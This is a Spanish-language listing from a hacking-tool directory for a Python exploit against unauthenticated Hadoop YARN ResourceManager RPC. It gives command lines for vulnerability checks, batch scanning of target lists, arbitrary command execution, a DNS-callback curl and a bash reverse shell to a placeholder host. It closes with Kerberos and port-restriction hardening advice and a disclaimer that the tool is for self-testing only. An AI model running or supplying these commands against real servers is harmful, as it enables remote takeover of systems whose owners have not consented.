Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Hadoop-Yarn-ResourceManager-RCE — Hadoop Yan ResourceManager unauthorized RCE | Kitploit
Herramientas/GitHubGitHub/al1ex/hadoop-yarn-resourcemanager-rce
Vulnerability ScannersVulnerability AnalysisExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubal1ex/hadoop-yarn-resourcemanager-rce

Hadoop-Yarn-ResourceManager-RCE

Hadoop Yan ResourceManager unauthorized RCE

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
3914hace 4 añosRevisado por Kitploit

Impacto de la vulnerabilidad

Había una vulnerabilidad de acceso no autorizado en Hadoop yarn ResourceManager. Esta vulnerabilidad existía en Hadoop yarn, el componente central de Hadoop. Debido a que Hadoop yarn abría el servicio RPC al público de forma predeterminada, un atacante remoto podía aprovechar esta vulnerabilidad de acceso no autorizado y ejecutar comandos arbitrarios a través del servicio RPC, controlando así el servidor objetivo. Dado el alto riesgo y el gran daño de esta vulnerabilidad, y que los detalles ya han sido divulgados y explotados por terceros, se recomienda que todos los usuarios de Apache Hadoop realicen una autocomprobación y tomen medidas de seguridad a tiempo.

Producto afectado

Apache Hadoop Yarn *

Comprobación de vulnerabilidad

Uso básico

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py

img

Comprobación de la vulnerabilidad

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com 

img

Ejecución de comandos

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com  -c "curl xxx.dnslog.cn"

attack

dnslog

Escaneo por lotes

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

scan_result

Shell inversa

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

reverse_shell1

Referencias

https://nosec.org/home/detail/4905.html

https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth

Consejos de seguridad

1.Habilite la autenticación Kerberos para evitar el acceso no autorizado.

root@kitploit:~
<property>
    <name>hadoop.security.authentication</name>
    <value>kerberos</value>
    <final>false</final>
    <source>core-site.xml</source>
</property>...
<property>
    <name>hadoop.rpc.protection</name>
    <value>authentication</value>
    <final>false</final>
    <source>core-default.xml</source>
</property>

2.Prohíba que las direcciones externas accedan a los puertos relacionados con el servicio RPC de Hadoop o configúrelos para que solo se abran a direcciones de confianza.

Declaración solemne: no utilice esta herramienta para fines ilegales. Esta herramienta solo se utiliza para la autocomprobación de seguridad por parte del personal de la Parte A y del personal de la Parte B. Si el usuario la utiliza ilegalmente, la responsabilidad legal recaerá en el usuario!!!

Descargar herramienta